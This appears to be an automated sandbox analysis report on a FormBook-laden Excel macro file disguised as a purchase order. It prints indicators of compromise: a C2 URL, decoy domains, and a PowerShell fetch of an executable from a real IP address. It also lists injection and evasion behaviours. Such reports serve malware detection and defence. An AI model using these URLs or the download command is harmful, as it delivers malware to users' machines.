Windows Analysis Report purchase Order.xlsm

Overview

General Information

Sample Name: purchase Order.xlsm
Analysis ID: 510341
MD5: d1ad5761044b2abb12b78700f1a3a537
SHA1: 7fed2064ae3681227f674608df64ff1d7c45a2ee
SHA256: 8024e6dc8c230782b570a234318ba7b5a72f64ad5a1a3ff81584e080d9338eba
Tags: xlsm

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic with higher score
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Injects a PE file into a foreign process
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Excel document contains an embedded macro which executes code when the document is opened
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.art-for-a-cause.com/m5cw/"], "decoy": ["stolpfabriken.com", "aromaessentialco.com", "rmcclaincpa.com", "wuruixin.com", "sidhyanticlasses.com", "horilka.store", "organic-outlaws.com", "customsoftwarelogistics.com", "cheryltesting.com", "thecompacthomegym.com", "the22yards.club", "quickloanprovidersservices.com", "grippyent.com", "guard-usa.com", "agircredit.com", "classificationmetallurgie.com", "quizzesandcode.com", "catdanos.com", "8676789.rest", "gotbestshavlngplansforyou.com", "supboarddesign.com", "byrdemailplans.xyz", "anngola.com", "milelefoods.com", "runawaypklyau.xyz", "redesignyourpain.com", "yourtv2ship.info", "jxypc.com", "lerjighjuij.store", "spiruline-shop.com", "qarziba-therapy.care", "hardayumangosteen.com", "freevolttech.com", "xiongbaosp.xyz", "balanzasdeplataforma.com", "johnathanmanney.com", "estcequecestgreen.com", "france-temps-partage.net", "fbiicrc.com", "privateairjets.com", "xn--5m4a23skoc.group", "andrewmurnane.com", "exitin90.com", "depofmvz.com", "bosphorus.website", "aragon.store", "nrnmuhendislik.com", "thesharingcorporation.com", "tccraft.online", "carjabber.com", "limitlesschurchbf.com", "dazalogistics.com", "x-play.club", "bitterbay.net", "forwardhcd.com", "smance.xyz", "netgearcloud.net", "wellaspiron.com", "heidelay.xyz", "qknzutohbtro.mobi", "epurhybrid.com", "pelitupmukaeksklusif.com", "secondave.online", "lockdownshowdown.online"]}
Multi AV Scanner detection for submitted file
Source: purchase Order.xlsm Virustotal: Detection: 22%
Source: purchase Order.xlsm ReversingLabs: Detection: 40%
Yara detected FormBook
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Antivirus / Scanner detection for submitted sample
Source: purchase Order.xlsm Avira: detected
Antivirus detection for URL or domain
Source: www.art-for-a-cause.com/m5cw/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://212.192.241.75/sam/new3.exe Virustotal: Detection: 11%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll Avira: detection malicious, Label: TR/Tesla.ivvdd
Source: C:\Users\Public\eVJOpc.exe Avira: detection malicious, Label: TR/Tesla.amqdv
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\eVJOpc.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll ReversingLabs: Detection: 37%
Machine Learning detection for dropped file
Source: C:\Users\Public\eVJOpc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 8.2.eVJOpc.exe.f040000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.eVJOpc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.1.eVJOpc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.3.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 19.2.wlanext.exe.2e7de48.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 9.0.eVJOpc.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.0.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 9.0.eVJOpc.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.2.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 9.0.eVJOpc.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.eVJOpc.exe.400000.1.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: wntdll.pdbUGP source: eVJOpc.exe, 00000008.00000003.370323842.000000000F210000.00000004.00000001.sdmp, eVJOpc.exe, 00000009.00000002.452970458.0000000000B20000.00000040.00000001.sdmp, wlanext.exe, 00000013.00000002.564446547.00000000033CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: eVJOpc.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
Source: Binary string: wlanext.pdbGCTL source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00405E93 FindFirstFileA,FindClose, 8_2_00405E93
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 8_2_004054BD
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00402671 FindFirstFileA, 8_2_00402671

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 212.192.241.75:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 212.192.241.75:80
Source: excel.exe Memory has grown: Private usage: 1MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.art-for-a-cause.com/m5cw/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RAPMSB-ASRU RAPMSB-ASRU
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Oct 2021 16:19:34 GMTServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30Last-Modified: Tue, 26 Oct 2021 23:46:46 GMTETag: "41504-5cf4a171fd45b"Accept-Ranges: bytesContent-Length: 267524Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /sam/new3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 212.192.241.75Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.241.75
Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.75
Source: PowerShell_transcript.061544.RzyXj49c.20211027181911.txt.1.dr String found in binary or memory: http://212.192.241.75/sam/new3.exe
Source: powershell.exe, 00000001.00000002.355847421.0000000002B50000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.356485936.0000000002C48000.00000004.00000020.sdmp, powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.355784668.0000000002B40000.00000004.00000040.sdmp String found in binary or memory: http://212.192.241.75/sam/new3.exe-OutFile$env:public
Source: powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmp String found in binary or memory: http://212.192.241.75/sam/new3.exenvoke-WebRequest
Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.754
Source: powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: eVJOpc.exe, eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000000A.00000000.383527191.00000000089CC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openxmlformatm
Source: powershell.exe, 00000001.00000002.357492979.00000000049D1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.aadrm.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.cortana.ai
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.office.net
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.onedrive.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://augloop.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cdn.entity.
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cortana.ai
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cortana.ai/api
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://cr.office.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://directory.services.
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: global traffic HTTP traffic detected: GET /sam/new3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: 212.192.241.75
Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: eVJOpc.exe, 00000008.00000002.372343961.00000000006CA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality to read data from the clipboard
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 8_2_00404FC2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
